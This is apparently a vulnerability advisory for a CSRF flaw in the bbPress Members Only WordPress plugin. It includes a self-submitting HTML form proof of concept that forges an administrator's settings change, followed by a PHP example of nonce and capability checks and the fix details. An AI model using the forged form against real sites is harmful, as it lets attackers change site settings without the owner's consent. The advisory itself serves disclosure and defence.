bbPress Members Only <= 1.2.1 - CSRF on Optional Settings page



Description
The plugin does not prevent Cross-Site Request Forgery attacks on its 'Optional Settings' page.
Proof of Concept
<html>
  <body onload="document.forms[0].submit()">
    <form action="http://127.0.0.1/wp-admin/admin.php?page=bpmemberoptionalsettings" method="POST">
      <input type="hidden" name="bbpdisableallfeature" value="yes" />
      <input type="hidden" name="bbpoptionsettinspanelsubmit" value="&#32;Submit&#32;" />
    </form>
  </body>
</html>
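The PoC above works because the settings handler accepts any POST that arrives with the victim's admin cookies. The following is an added example, not the plugin's code or the vendor's fix, showing how the same form and handler look with the standard WordPress protections in place: a capability check and a per-user nonce that a form hosted on another origin cannot supply. The field names follow the PoC; the function names, hook, nonce action and option name are assumptions.

```php
<?php
// Added example (not the plugin's code): a settings page and handler for
// admin.php?page=bpmemberoptionalsettings hardened against the CSRF the
// advisory describes. Field names come from the PoC; the function names,
// the nonce action/field name and the option name are assumptions.

// Hypothetical render callback for the 'Optional Settings' admin page.
function bpmember_render_optional_settings() {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( esc_html__( 'Insufficient permissions.' ) );
    }
    $disabled = get_option( 'bbpdisableallfeature', 'no' ); // assumed option name
    ?>
    <form action="<?php echo esc_url( admin_url( 'admin.php?page=bpmemberoptionalsettings' ) ); ?>" method="post">
        <?php
        // Emits a hidden field holding a token bound to this user, this
        // action and the current session; an attacker's page cannot read it.
        wp_nonce_field( 'bpmember_optional_settings', 'bpmember_optional_settings_nonce' );
        ?>
        <label>
            <input type="checkbox" name="bbpdisableallfeature" value="yes" <?php checked( $disabled, 'yes' ); ?> />
            Disable all features
        </label>
        <input type="submit" name="bbpoptionsettinspanelsubmit" value="Submit" />
    </form>
    <?php
}

// Hypothetical handler, run on admin_init before the page renders.
function bpmember_handle_optional_settings() {
    if ( ! isset( $_POST['bbpoptionsettinspanelsubmit'] ) ) {
        return; // no submission to process
    }

    // Authorisation: a forged request carries the victim's cookies, so a
    // login check alone is not enough; require the capability explicitly.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( esc_html__( 'Insufficient permissions.' ) );
    }

    // CSRF defence: check_admin_referer() verifies the nonce field and the
    // admin referer, and calls wp_die() if either is missing or invalid.
    // The cross-origin form in the PoC cannot include a valid token.
    check_admin_referer( 'bpmember_optional_settings', 'bpmember_optional_settings_nonce' );

    // Only then apply the change, normalising the input to the two allowed values.
    $value = ( isset( $_POST['bbpdisableallfeature'] ) && 'yes' === $_POST['bbpdisableallfeature'] ) ? 'yes' : 'no';
    update_option( 'bbpdisableallfeature', $value );
}
add_action( 'admin_init', 'bpmember_handle_optional_settings' );
```

The two checks guard different things: `current_user_can()` stops low-privileged accounts from changing the setting directly, while the nonce stops an attacker from making an administrator's browser submit the form for them. Omitting either leaves the page exposed; the advisory concerns the latter.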

Affects Plugin

bbPress Members Only
Fixed in version 1.3.1

References

URL https://plugins.trac.wordpress.org/changeset/2217984

Classification

Type CSRF
CWE CWE-352

Miscellaneous

Views 166709
Verified Yes
WPVDB ID 9982

Timeline

Publicly Published 2019-12-26
Added 2019-12-26
Last Updated 2019-12-26
